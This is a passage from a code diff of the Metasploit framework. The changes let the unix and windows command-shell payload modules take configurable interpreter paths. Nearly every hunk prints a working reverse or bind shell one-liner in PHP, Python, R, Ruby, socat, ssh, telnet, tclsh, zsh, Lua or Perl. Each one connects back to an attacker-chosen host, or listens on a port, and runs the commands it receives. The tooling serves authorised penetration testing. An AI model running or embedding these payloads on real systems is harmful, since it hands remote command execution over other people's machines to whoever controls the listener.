     cmd += "$c=IO::Socket::SSL->new(PeerAddr=>\"#{lhost}:#{datastore['LPORT']}\",SSL_verify_mode=>0);"
     cmd += "while(sysread($c,$i,8192)){syswrite($c,`$i`);}'"
   end

--- a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb
@@ -13,22 +13,27 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Reverse TCP SSL (via php)',
-      'Description'   => 'Creates an interactive shell via php, uses SSL',
-      'Author'        => 'RageLtMan <rageltman[at]sempervictus>',
-      'License'       => BSD_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::ReverseTcpSsl,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'php',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Unix Command Shell, Reverse TCP SSL (via php)',
+     'Description'   => 'Creates an interactive shell via php, uses SSL',
+     'Author'        => 'RageLtMan <rageltman[at]sempervictus>',
+     'License'       => BSD_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::ReverseTcpSsl,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'php',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('PHPPath', [true, 'The path to the PHP executable', 'php'])
+      ]
+    )
   end
 
   #
@@ -46,6 +51,6 @@ module MetasploitModule
     lhost = datastore['LHOST']
     ver   = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
     lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
-    cmd = "php -r '$ctxt=stream_context_create([\"ssl\"=>[\"verify_peer\"=>false,\"verify_peer_name\"=>false]]);while($s=@stream_socket_client(\"ssl://#{datastore['LHOST']}:#{datastore['LPORT']}\",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}}'&"
+    cmd = "#{datastore['PHPPath']} -r '$ctxt=stream_context_create([\"ssl\"=>[\"verify_peer\"=>false,\"verify_peer_name\"=>false]]);while($s=@stream_socket_client(\"ssl://#{datastore['LHOST']}:#{datastore['LPORT']}\",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}}'&"
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_python.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python.rb
@@ -14,22 +14,29 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Unix Command Shell, Reverse TCP (via Python)',
-      'Version'     => '$Revision: 1 $',
-      'Description' => 'Connect back and create a command shell via Python',
-      'Author'      => 'bcoles',
-      'License'     => MSF_LICENSE,
-      'Platform'    => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Handler'     => Msf::Handler::ReverseTcp,
-      'Session'     => Msf::Sessions::CommandShell,
-      'PayloadType' => 'cmd',
-      'RequiredCmd' => 'python',
-      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+     'Name'        => 'Unix Command Shell, Reverse TCP (via Python)',
+     'Version'     => '$Revision: 1 $',
+     'Description' => 'Connect back and create a command shell via Python',
+     'Author'      => 'bcoles',
+     'License'     => MSF_LICENSE,
+     'Platform'    => 'unix',
+     'Arch'        => ARCH_CMD,
+     'Handler'     => Msf::Handler::ReverseTcp,
+     'Session'     => Msf::Sessions::CommandShell,
+     'PayloadType' => 'cmd',
+     'RequiredCmd' => 'python',
+     'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
     ))
-    register_options([
-      OptString.new('SHELL', [true, 'The system shell to use.', '/bin/bash'])
-    ])
+    register_options(
+      [
+        OptString.new('SHELL', [ true, 'The system shell to use', '/bin/sh' ])
+      ]
+    )
+    register_advanced_options(
+      [
+        OptString.new('PythonPath', [true, 'The path to the Python executable', 'python'])
+      ]
+    )
   end
 
   def generate(_opts = {})
@@ -51,6 +58,6 @@ module MetasploitModule
   def command_string
     raw_cmd = "import socket,subprocess,os;host=\"#{datastore['LHOST']}\";port=#{datastore['LPORT']};s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((host,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(\"#{datastore['SHELL']}\")"
     cmd = raw_cmd.gsub(/,/, "#{random_padding},#{random_padding}").gsub(/;/, "#{random_padding};#{random_padding}")
-    "python -c \"#{ py_create_exec_stub(cmd) }\""
+    "#{datastore['PythonPath']} -c \"#{ py_create_exec_stub(cmd) }\""
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
@@ -14,22 +14,27 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Reverse TCP SSL (via python)',
-      'Description'   => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design.',
-      'Author'        => 'RageLtMan <rageltman[at]sempervictus>',
-      'License'       => BSD_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::ReverseTcpSsl,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'python',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Unix Command Shell, Reverse TCP SSL (via python)',
+     'Description'   => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design.',
+     'Author'        => 'RageLtMan <rageltman[at]sempervictus>',
+     'License'       => BSD_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::ReverseTcpSsl,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'python',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('PythonPath', [true, 'The path to the Python executable', 'python'])
+      ]
+    )
   end
 
   #
@@ -59,6 +64,6 @@ module MetasploitModule
     cmd += "\tproc=subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
     cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
     cmd += "\ts.send(stdout_value)\n"
-    "python -c \"#{ py_create_exec_stub(cmd) }\""
+    "#{datastore['PythonPath']} -c \"#{ py_create_exec_stub(cmd) }\""
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_r.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_r.rb
@@ -14,18 +14,23 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Unix Command Shell, Reverse TCP (via R)',
-      'Description' => 'Connect back and create a command shell via R',
-      'Author'      => [ 'RageLtMan <rageltman[at]sempervictus>' ],
-      'License'     => MSF_LICENSE,
-      'Platform'    => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Handler'     => Msf::Handler::ReverseTcp,
-      'Session'     => Msf::Sessions::CommandShell,
-      'PayloadType' => 'cmd',
-      'RequiredCmd' => 'R',
-      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+     'Name'        => 'Unix Command Shell, Reverse TCP (via R)',
+     'Description' => 'Connect back and create a command shell via R',
+     'Author'      => [ 'RageLtMan <rageltman[at]sempervictus>' ],
+     'License'     => MSF_LICENSE,
+     'Platform'    => 'unix',
+     'Arch'        => ARCH_CMD,
+     'Handler'     => Msf::Handler::ReverseTcp,
+     'Session'     => Msf::Sessions::CommandShell,
+     'PayloadType' => 'cmd',
+     'RequiredCmd' => 'R',
+     'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
     ))
+    register_advanced_options(
+      [
+        OptString.new('RPath', [true, 'The path to the R executable', 'R'])
+      ]
+    )
   end
 
   def generate(_opts = {})
@@ -33,14 +38,14 @@ module MetasploitModule
   end
 
   def prepends(r_string)
-   return "R -e \"#{r_string}\""
+    return "#{datastore['RPath']} -e \"#{r_string}\""
   end
 
   def r_string
     lhost = datastore['LHOST']
     lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
     return "s<-socketConnection(host='#{lhost}',port=#{datastore['LPORT']}," +
-    "blocking=TRUE,server=FALSE,open='r+');while(TRUE){writeLines(readLines" +
-    "(pipe(readLines(s, 1))),s)}"
+      "blocking=TRUE,server=FALSE,open='r+');while(TRUE){writeLines(readLines" +
+      "(pipe(readLines(s, 1))),s)}"
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_ruby.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_ruby.rb
@@ -13,18 +13,23 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Unix Command Shell, Reverse TCP (via Ruby)',
-      'Description' => 'Connect back and create a command shell via Ruby',
-      'Author'      => 'kris katterjohn',
-      'License'     => MSF_LICENSE,
-      'Platform'    => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Handler'     => Msf::Handler::ReverseTcp,
-      'Session'     => Msf::Sessions::CommandShell,
-      'PayloadType' => 'cmd',
-      'RequiredCmd' => 'ruby',
-      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+     'Name'        => 'Unix Command Shell, Reverse TCP (via Ruby)',
+     'Description' => 'Connect back and create a command shell via Ruby',
+     'Author'      => 'kris katterjohn',
+     'License'     => MSF_LICENSE,
+     'Platform'    => 'unix',
+     'Arch'        => ARCH_CMD,
+     'Handler'     => Msf::Handler::ReverseTcp,
+     'Session'     => Msf::Sessions::CommandShell,
+     'PayloadType' => 'cmd',
+     'RequiredCmd' => 'ruby',
+     'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
     ))
+    register_advanced_options(
+      [
+        OptString.new('RubyPath', [true, 'The path to the Ruby executable', 'ruby'])
+      ]
+    )
   end
 
   def generate(_opts = {})
@@ -35,6 +40,6 @@ module MetasploitModule
   def command_string
     lhost = datastore['LHOST']
     lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
-    "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{datastore['LPORT']}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'"
+    "#{datastore['RubyPath']} -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{datastore['LPORT']}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'"
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb
@@ -13,18 +13,23 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Unix Command Shell, Reverse TCP SSL (via Ruby)',
-      'Description' => 'Connect back and create a command shell via Ruby, uses SSL',
-      'Author'      => 'RageLtMan <rageltman[at]sempervictus>',
-      'License'     => MSF_LICENSE,
-      'Platform'    => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Handler'     => Msf::Handler::ReverseTcpSsl,
-      'Session'     => Msf::Sessions::CommandShell,
-      'PayloadType' => 'cmd',
-      'RequiredCmd' => 'ruby',
-      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+     'Name'        => 'Unix Command Shell, Reverse TCP SSL (via Ruby)',
+     'Description' => 'Connect back and create a command shell via Ruby, uses SSL',
+     'Author'      => 'RageLtMan <rageltman[at]sempervictus>',
+     'License'     => MSF_LICENSE,
+     'Platform'    => 'unix',
+     'Arch'        => ARCH_CMD,
+     'Handler'     => Msf::Handler::ReverseTcpSsl,
+     'Session'     => Msf::Sessions::CommandShell,
+     'PayloadType' => 'cmd',
+     'RequiredCmd' => 'ruby',
+     'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
     ))
+    register_advanced_options(
+      [
+        OptString.new('RubyPath', [true, 'The path to the Ruby executable', 'ruby'])
+      ]
+    )
   end
 
   def generate(_opts = {})
@@ -35,7 +40,7 @@ module MetasploitModule
   def command_string
     lhost = datastore['LHOST']
     lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
-    res = "ruby -rsocket -ropenssl -e 'exit if fork;c=OpenSSL::SSL::SSLSocket.new"
+    res = "#{datastore['RubyPath']} -rsocket -ropenssl -e 'exit if fork;c=OpenSSL::SSL::SSLSocket.new"
     res << "(TCPSocket.new(\"#{lhost}\",\"#{datastore['LPORT']}\")).connect;while"
     res << "(cmd=c.gets);IO.popen(cmd.to_s,\"r\"){|io|c.print io.read}end'"
     return res

--- a/modules/payloads/singles/cmd/unix/reverse_socat_udp.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_socat_udp.rb
@@ -13,22 +13,28 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Reverse UDP (via socat)',
-      'Description'   => 'Creates an interactive shell via socat',
-      'Author'        => 'RageLtMan <rageltman[at]sempervictus>',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::ReverseUdp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'socat',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Unix Command Shell, Reverse UDP (via socat)',
+     'Description'   => 'Creates an interactive shell via socat',
+     'Author'        => 'RageLtMan <rageltman[at]sempervictus>',
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::ReverseUdp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'socat',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('SocatPath', [true, 'The path to the Socat executable', 'socat']),
+        OptString.new('BashPath', [true, 'The path to the Bash executable', 'bash'])
+      ]
+    )
   end
 
   #
@@ -43,7 +49,7 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    "socat udp-connect:#{datastore['LHOST']}:#{datastore['LPORT']} exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &"
+    "#{datastore['SocatPath']} udp-connect:#{datastore['LHOST']}:#{datastore['LPORT']} exec:'#{datastore['BashPath']} -li',pty,stderr,sane 2>&1>/dev/null &"
   end
 
 end

--- a/modules/payloads/singles/cmd/unix/reverse_ssh.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_ssh.rb
@@ -14,20 +14,20 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Unix Command Shell, Reverse TCP SSH',
-      'Description' => 'Connect back and create a command shell via SSH',
-      'Author'      => [
-        'RageLtMan <rageltman[at]sempervictus>', # Rex/Metasploit
-        'hirura' # HrrRbSsh
-      ],
-      'License'     => MSF_LICENSE,
-      'Platform'    => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Handler'     => Msf::Handler::ReverseSsh,
-      'Session'     => Msf::Sessions::SshCommandShellReverse,
-      'PayloadType' => 'cmd',
-      'RequiredCmd' => 'ssh',
-      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+     'Name'        => 'Unix Command Shell, Reverse TCP SSH',
+     'Description' => 'Connect back and create a command shell via SSH',
+     'Author'      => [
+       'RageLtMan <rageltman[at]sempervictus>', # Rex/Metasploit
+       'hirura' # HrrRbSsh
+     ],
+     'License'     => MSF_LICENSE,
+     'Platform'    => 'unix',
+     'Arch'        => ARCH_CMD,
+     'Handler'     => Msf::Handler::ReverseSsh,
+     'Session'     => Msf::Sessions::SshCommandShellReverse,
+     'PayloadType' => 'cmd',
+     'RequiredCmd' => 'ssh',
+     'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
     ))
     register_advanced_options(
       [
@@ -35,7 +35,9 @@ module MetasploitModule
           false,
           "Space separated options for the ssh client",
           'UserKnownHostsFile=/dev/null StrictHostKeyChecking=no'
-        ])
+        ]),
+        OptString.new('SSHPath', [true, 'The path to the SSH executable', 'ssh']),
+        OptString.new('ShellPath', [true, 'The path to the shell to execute', '/bin/sh'])
       ]
     )
   end
@@ -54,6 +56,6 @@ module MetasploitModule
     backpipe = Rex::Text.rand_text_alpha_lower(4..8)
     lport = datastore['LPORT'] == 22 ? '' : "-p #{datastore['LPORT']} "
     opts =  datastore['SshClientOptions'].blank? ? '' : datastore['SshClientOptions'].split(' ').compact.map {|e| e = "-o #{e} " }.join
-    "mkfifo /tmp/#{backpipe};ssh -qq #{opts}#{datastore['LHOST']} #{lport}0</tmp/#{backpipe}|/bin/sh >/tmp/#{backpipe} 2>&1;rm /tmp/#{backpipe}"
+    "mkfifo /tmp/#{backpipe};#{datastore['SSHPath']} -qq #{opts}#{datastore['LHOST']} #{lport}0</tmp/#{backpipe}|#{datastore['ShellPath']} >/tmp/#{backpipe} 2>&1;rm /tmp/#{backpipe}"
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb
@@ -13,25 +13,31 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Unix Command Shell, Double Reverse TCP SSL (telnet)',
-      'Description'   => 'Creates an interactive shell through two inbound connections, encrypts using SSL via "-z" option',
-      'Author'        => [
-        'hdm',	# Original module
-        'RageLtMan <rageltman[at]sempervictus>', # SSL support
-      ],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'unix',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::ReverseTcpDoubleSSL,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'telnet',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Unix Command Shell, Double Reverse TCP SSL (telnet)',
+     'Description'   => 'Creates an interactive shell through two inbound connections, encrypts using SSL via "-z" option',
+     'Author'        => [
+       'hdm',	# Original module
+       'RageLtMan <rageltman[at]sempervictus>', # SSL support
+     ],
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'unix',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::ReverseTcpDoubleSSL,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'telnet',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('TelnetPath', [true, 'The path to the telnet executable', 'telnet']),
+        OptString.new('ShellPath', [true, 'The path to the shell to execute', 'sh'])
+      ]
+    )
   end
 
   #
@@ -47,10 +53,10 @@ module MetasploitModule
   #
   def command_string
     cmd =
-      "sh -c '(sleep #{3600+rand(1024)}|" +
-      "telnet -z #{datastore['LHOST']} #{datastore['LPORT']}|" +
-      "while : ; do sh && break; done 2>&1|" +
-      "telnet -z #{datastore['LHOST']} #{datastore['LPORT']}" +
+      "#{datastore['ShellPath']} -c '(sleep #{3600+rand(1024)}|" +
+      "#{datastore['TelnetPath']} -z #{datastore['LHOST']} #{datastore['LPORT']}|" +
+      "while : ; do #{datastore['ShellPath']} && break; done 2>&1|" +
+      "#{datastore['TelnetPath']} -z #{datastore['LHOST']} #{datastore['LPORT']}" +
       " >/dev/null 2>&1 &)'"
     return cmd
   end

--- a/modules/payloads/singles/cmd/unix/reverse_tclsh.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_tclsh.rb
@@ -29,6 +29,11 @@ module MetasploitModule
         }
       )
     )
+    register_advanced_options(
+      [
+        OptString.new('TCLSHPath', [true, 'The path to the TCLSH executable', 'tclsh'])
+      ]
+    )
   end
 
   #
@@ -42,6 +47,6 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    %(echo 'set s [socket #{datastore['LHOST']} #{datastore['LPORT']}];set c "";while {$c != "exit"} {flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} {puts $s $r};flush $s;};close $s;'|tclsh)
+    %(echo 'set s [socket #{datastore['LHOST']} #{datastore['LPORT']}];set c "";while {$c != "exit"} {flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} {puts $s $r};flush $s;};close $s;'|#{datastore['TCLSHPath']})
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_zsh.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_zsh.rb
@@ -13,25 +13,30 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Unix Command Shell, Reverse TCP (via Zsh)',
-      'Description' => %q{
+     'Name'        => 'Unix Command Shell, Reverse TCP (via Zsh)',
+     'Description' => %q{
         Connect back and create a command shell via Zsh.  Note: Although Zsh is often
         available, please be aware it isn't usually installed by default.
       },
-      'Author'      =>
-        [
-          'Doug Prostko <dougtko[at]gmail.com>',    # Initial payload
-          'Wang Yihang <wangyihanger[at]gmail.com>' # Simplified redirections
-        ],
-      'License'     => MSF_LICENSE,
-      'Platform'    => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Handler'     => Msf::Handler::ReverseTcp,
-      'Session'     => Msf::Sessions::CommandShell,
-      'PayloadType' => 'cmd',
-      'RequiredCmd' => 'zsh',
-      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+     'Author'      =>
+       [
+         'Doug Prostko <dougtko[at]gmail.com>',    # Initial payload
+         'Wang Yihang <wangyihanger[at]gmail.com>' # Simplified redirections
+       ],
+     'License'     => MSF_LICENSE,
+     'Platform'    => 'unix',
+     'Arch'        => ARCH_CMD,
+     'Handler'     => Msf::Handler::ReverseTcp,
+     'Session'     => Msf::Sessions::CommandShell,
+     'PayloadType' => 'cmd',
+     'RequiredCmd' => 'zsh',
+     'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
     ))
+    register_advanced_options(
+      [
+        OptString.new('ZSHPath', [true, 'The path to the ZSH executable', 'zsh'])
+      ]
+    )
   end
 
   def generate(_opts = {})
@@ -39,6 +44,6 @@ module MetasploitModule
   end
 
   def command_string
-    "zsh -c 'zmodload zsh/net/tcp && ztcp #{datastore['LHOST']} #{datastore['LPORT']} && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'"
+    "#{datastore['ZSHPath']} -c 'zmodload zsh/net/tcp && ztcp #{datastore['LHOST']} #{datastore['LPORT']} && #{datastore['ZSHPath']} >&$REPLY 2>&$REPLY 0>&$REPLY'"
   end
 end

--- a/modules/payloads/singles/cmd/windows/bind_lua.rb
+++ b/modules/payloads/singles/cmd/windows/bind_lua.rb
@@ -13,25 +13,30 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Windows Command Shell, Bind TCP (via Lua)',
-      'Description'   => 'Listen for a connection and spawn a command shell via Lua',
-      'Author'        =>
-        [
-          'xistence <xistence[at]0x90.nl>',
-        ],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'win',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'lua',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Windows Command Shell, Bind TCP (via Lua)',
+     'Description'   => 'Listen for a connection and spawn a command shell via Lua',
+     'Author'        =>
+       [
+         'xistence <xistence[at]0x90.nl>',
+       ],
+     'License'       => MSF_LICENSE,
+     'Platform'      => 'win',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::BindTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'lua',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('LuaPath', [true, 'The path to the Lua executable', 'lua'])
+      ]
+    )
   end
 
   #
@@ -45,7 +50,7 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    "lua -e \"local s=require('socket');local s=assert(s.bind('*',#{datastore['LPORT']}));local c=s:accept();while true do local r,x=c:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));c:send(b);end;c:close();f:close();\""
+    "#{datastore['LuaPath']} -e \"local s=require('socket');local s=assert(s.bind('*',#{datastore['LPORT']}));local c=s:accept();while true do local r,x=c:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));c:send(b);end;c:close();f:close();\""
   end
 end
 

--- a/modules/payloads/singles/cmd/windows/bind_perl.rb
+++ b/modules/payloads/singles/cmd/windows/bind_perl.rb
@@ -13,22 +13,27 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Windows Command Shell, Bind TCP (via Perl)',
-      'Description'   => 'Listen for a connection and spawn a command shell via perl (persistent)',
-      'Author'        => ['Samy <samy[at]samy.pl>', 'cazz', 'aushack'],
-      'License'       => BSD_LICENSE,
-      'Platform'      => 'win',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'perl',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Windows Command Shell, Bind TCP (via Perl)',
+     'Description'   => 'Listen for a connection and spawn a command shell via perl (persistent)',
+     'Author'        => ['Samy <samy[at]samy.pl>', 'cazz', 'aushack'],
+     'License'       => BSD_LICENSE,
+     'Platform'      => 'win',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::BindTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'perl',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('PerlPath', [true, 'The path to the Perl executable', 'perl'])
+      ]
+    )
   end
 
   #
@@ -43,7 +48,7 @@ module MetasploitModule
   #
   def command_string
 
-    cmd = "perl -MIO -e \"while($c=new IO::Socket::INET(LocalPort,#{datastore['LPORT']},Reuse,1,Listen)->accept){$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>}\""
+    cmd = "#{datastore['PerlPath']} -MIO -e \"while($c=new IO::Socket::INET(LocalPort,#{datastore['LPORT']},Reuse,1,Listen)->accept){$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>}\""
 
     return cmd
   end

--- a/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb
+++ b/modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb
@@ -13,22 +13,27 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'          => 'Windows Command Shell, Bind TCP (via perl) IPv6',
-      'Description'   => 'Listen for a connection and spawn a command shell via perl (persistent)',
-      'Author'        => ['Samy <samy[at]samy.pl>', 'cazz', 'aushack'],
-      'License'       => BSD_LICENSE,
-      'Platform'      => 'win',
-      'Arch'          => ARCH_CMD,
-      'Handler'       => Msf::Handler::BindTcp,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'cmd',
-      'RequiredCmd'   => 'perl',
-      'Payload'       =>
-        {
-          'Offsets' => { },
-          'Payload' => ''
-        }
-      ))
+     'Name'          => 'Windows Command Shell, Bind TCP (via perl) IPv6',
+     'Description'   => 'Listen for a connection and spawn a command shell via perl (persistent)',
+     'Author'        => ['Samy <samy[at]samy.pl>', 'cazz', 'aushack'],
+     'License'       => BSD_LICENSE,
+     'Platform'      => 'win',
+     'Arch'          => ARCH_CMD,
+     'Handler'       => Msf::Handler::BindTcp,
+     'Session'       => Msf::Sessions::CommandShell,
+     'PayloadType'   => 'cmd',
+     'RequiredCmd'   => 'perl',
+     'Payload'       =>
+       {
+         'Offsets' => { },
+         'Payload' => ''
+       }
+    ))
+    register_advanced_options(
+      [
+        OptString.new('PerlPath', [true, 'The path to the Perl executable', 'perl'])
+      ]
+    )
   end
 
   #
@@ -43,7 +48,7 @@ module MetasploitModule
   #
   def command_string
 
-    cmd = "perl -MIO -e \"while($c=new IO::Socket::INET6(LocalPort,#{datastore['LPORT']},Reuse,1,Listen)->accept){$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>}\""
+    cmd = "#{datastore['PerlPath']} -MIO -e \"while($c=new IO::Socket::INET6(LocalPort,#{datastore['LPORT']},Reuse,1,Listen)->accept){$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>}\""
 
     return cmd
   end

--- a/modules/payloads/singles/cmd/windows/bind_ruby.rb
+++ b/modules/payloads/singles/cmd/windows/bind_ruby.rb
@@ -13,18 +13,23 @@ module MetasploitModule
 
   def initialize(info = {})
     super(merge_info(info,
-      'Name'        => 'Windows Command Shell, Bind TCP (via Ruby)',
